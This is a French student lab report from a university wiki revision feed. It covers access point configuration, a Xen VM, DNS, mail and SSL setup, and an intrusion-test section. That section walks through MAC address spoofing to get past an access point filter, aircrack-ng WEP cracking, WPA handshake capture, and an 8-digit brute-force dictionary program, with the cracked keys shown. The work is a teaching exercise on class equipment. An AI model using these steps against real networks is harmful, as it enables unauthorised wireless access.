ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Sécurisation Wifi par WPA2-EAP&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès&amp;lt;/h3&amp;gt;&lt;br /&gt;
On commence par remettre le point d’accès en configuration d'usine &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#erase startup-config&lt;br /&gt;
ap#reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#line vty 0 15 &lt;br /&gt;
ap(config-line)#password ****&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip default-gateway 172.20.99.254&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface bvi 1 &lt;br /&gt;
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration de la machine virtuel&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe freeradius: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install FreeRadius&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On configure la conexion:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# nano eap.conf&lt;br /&gt;
// on remplace &lt;br /&gt;
default_eap_type = md5&lt;br /&gt;
// par&lt;br /&gt;
default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
# nano clients.conf &lt;br /&gt;
client 172.20.99.0/24 {&lt;br /&gt;
        secret          = topsecret&lt;br /&gt;
        shortname       = wifi&lt;br /&gt;
&lt;br /&gt;
# nano users &lt;br /&gt;
john    Cleartext-Password := &amp;quot;****&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# service freeradius restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#nano 000-domain.tld-ssl.conf&lt;br /&gt;
    &amp;lt;VirtualHost 193.48.57.181:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.love-in-the-world.space&lt;br /&gt;
        ServerAlias love-in-the-world.space&lt;br /&gt;
        DocumentRoot /var/www/html/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/chien.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/chien.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#a2enmod ssl&lt;br /&gt;
#service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23161</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23161"/>
				<updated>2015-11-23T16:45:17Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
